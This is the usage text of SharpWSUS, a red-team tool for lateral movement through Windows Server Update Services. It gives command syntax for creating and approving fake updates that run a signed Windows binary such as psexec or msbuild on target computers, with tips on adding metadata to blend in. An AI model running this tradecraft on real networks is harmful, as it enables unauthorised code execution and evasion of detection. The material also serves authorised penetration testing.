SharpWSUS - CSharp tool for lateral movement through WSUS

____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team

Commands listed below have optional parameters in <>.

Locate the WSUS server:
SharpWSUS.exe locate

Inspect the WSUS server, enumerating clients, servers and existing groups:
SharpWSUS.exe inspect

Create an update (NOTE: The payload has to be a windows signed binary):
SharpWSUS.exe create /payload:[File location] /args:[Args for payload] </title:[Update title] /date:[YYYY-MM-DD] /kb:[KB on update] /rating:[Rating of update] /msrc:[MS RC] /description:[description] /url:[url]>

Approve an update:
SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target] </groupname:[Group for computer to be added too] /approver:[Name of approver]>

Check status of an update:
SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]

Delete update and clean up groups added:
SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN] </groupname:[GroupName] /keepgroup>

Notes

Binary has to be windows signed, so psexec, msiexec, msbuild etc could be useful for lateral movement. The metadata on the create command is not needed, but is useful for blending in to the environment. If testing in a lab the first is usually quick, then each subsequent update will take a couple hours (this is due to how windows evaluates whether an update is installed already or not)